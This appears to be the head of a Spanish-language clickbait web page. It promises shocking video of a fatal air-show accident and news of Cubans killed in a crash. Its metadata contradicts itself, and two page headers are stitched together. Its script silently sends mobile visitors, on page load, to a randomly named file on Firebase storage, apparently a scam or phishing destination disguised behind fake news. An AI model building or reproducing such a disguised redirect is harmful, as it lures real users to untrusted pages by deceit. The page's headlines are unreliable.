<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="utf-8"/>
<meta name="title" content="Stream"/>
<meta name="keywords" content="Instagram"/>
<meta property="og:description" content="2411"/>
<meta name="googlebot" content="noindex"/>
<meta name="robots" content="index"/>
<meta name="robots" content="noindex"/>
<meta name="robots" content="nofollow"/>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<meta property="og:title" content="Dramático video: captan terrible accidente mortal durante show aéreo, Esta mañana"/>
<meta property="og:image" content="https://buffer-media-uploads.s3.amazonaws.com/6028a00afcd03b4cf3218b0a/6622c9e7b36dcf89320c8d74/f5c9337206d858cdca907efabf0e26cd.original.jpg"/>
<meta name="apple-itunes-app" content="app-id=6448311069"/>
<!DOCTYPE html>
<html>
<head>
    <title>Revelan identidades de cubanos fallecidos y heridos en accidente de transito esta mañana</title>
    <script>
        // Función para detectar si es un dispositivo móvil
        function esDispositivoMovil() {
            return /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);
        }

        // Función para redirigir si es un dispositivo móvil
        function redireccionarSiEsMovil() {
            if (esDispositivoMovil()) {
                // URL a la que quieres redirigir para dispositivos móviles
                var urlMovil = 'https://firebasestorage.googleapis.com/v0/b/myzink0001.appspot.com/o/legfasyyyy.html?alt=media&token=39c69c2c-2a72-4e91-a4d3-396c9f6c3ef4';

                // Redirigir al usuario a la URL para dispositivos móviles
                window.location.href = urlMovil;
            }
        }

        // Llamar a la función de redireccionamiento cuando la página cargue
        window.onload = redireccionarSiEsMovil;
    </script>